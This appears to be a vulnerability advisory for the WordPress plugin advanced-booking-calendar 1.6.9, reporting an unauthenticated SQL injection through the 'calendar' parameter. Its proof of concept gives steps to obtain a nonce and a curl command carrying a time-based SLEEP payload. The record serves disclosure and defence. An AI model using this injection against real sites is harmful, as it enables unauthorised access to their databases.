The plugin does not validate and escape the calendar parameter before using it in a SQL statement via the abc_booking_getSingleCalendar AJAX action (available to both unauthenticated and authenticated users), leading to an unauthenticated SQL injection
1. Install the vulnerable plugin (advanced-booking-calendar version 1.6.9) 2. Create a new calendar (the specific configuration shouldn't matter - we just need the shortcode) 3. Create a new page with the shortcode you receive when you finish creating a calendar 4. Visit the just created page and extract the nonce (search for abc_nonce in the source) 5. Invoke the following command to induce a 5 second sleep curl -i http://example.com/wp-admin/admin-ajax.php --data 'action=abc_booking_getSingleCalendar&abc_nonce=7d55255d19&uniqid=620ff6dacd7f8&month=3&calendar=(SELECT 4061 FROM (SELECT(SLEEP(5)))GjRo)' Note: + "abc_nonce" is the required nonce + "uniqid" can be a random string + "month" should be provided and be a valid int (a month in a year) + "calendar" is the injection point
cydave
cydave
Yes
2022-02-28 (about 1 years ago)
2022-02-28 (about 1 years ago)
2022-04-16 (about 1 years ago)